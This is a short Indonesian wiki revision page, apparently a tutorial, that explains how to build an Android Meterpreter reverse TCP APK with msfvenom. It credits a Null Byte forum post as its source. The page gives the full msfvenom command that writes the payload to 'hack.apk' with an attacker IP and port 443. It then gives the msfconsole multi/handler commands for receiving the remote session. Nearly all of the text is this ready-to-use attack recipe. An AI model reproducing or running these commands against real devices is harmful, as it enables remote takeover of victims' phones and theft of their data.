Difference between revisions of "MSF: Android/Meterpreter/reverse tcp APK dengan msfvenom"
		
		
		
		
		
		Jump to navigation
		Jump to search
		
				
		
		
	
Onnowpurbo (talk | contribs)  (Created page with "sumber: https://null-byte.wonderhowto.com/forum/create-and-use-android-meterpreter-reverse-tcp-apk-with-msfvenom-0162921/  Hi, Metasploit was updated recently (or, at least, s...")  | 
				Onnowpurbo (talk | contribs)   | 
				||
| Line 1: | Line 1: | ||
sumber: https://null-byte.wonderhowto.com/forum/create-and-use-android-meterpreter-reverse-tcp-apk-with-msfvenom-0162921/  | sumber: https://null-byte.wonderhowto.com/forum/create-and-use-android-meterpreter-reverse-tcp-apk-with-msfvenom-0162921/  | ||
| − | + | Membuat apk dengan msfvenom  | |
| − | + |  msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.209 LPORT=443 > hack.apk  | |
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | + | Asumsi  | |
| − | + |  IP attacker (kali linux) 192.168.0.209  | |
| − | + |  port attacker 443  | |
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | + | Di sisi attacker / kali linux  | |
| + | |||
| + |  msfconsole  | ||
| + | |||
| + |  use exploit/multi/handler  | ||
| + |  set payload android/meterpreter/reverse_tcp  | ||
| + |  set lhost 192.168.0.209  | ||
| + |  set lport 443  | ||
| + |  exploit  | ||
Latest revision as of 05:50, 1 June 2017
Membuat apk dengan msfvenom
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.209 LPORT=443 > hack.apk
Asumsi
IP attacker (kali linux) 192.168.0.209 port attacker 443
Di sisi attacker / kali linux
msfconsole
use exploit/multi/handler set payload android/meterpreter/reverse_tcp set lhost 192.168.0.209 set lport 443 exploit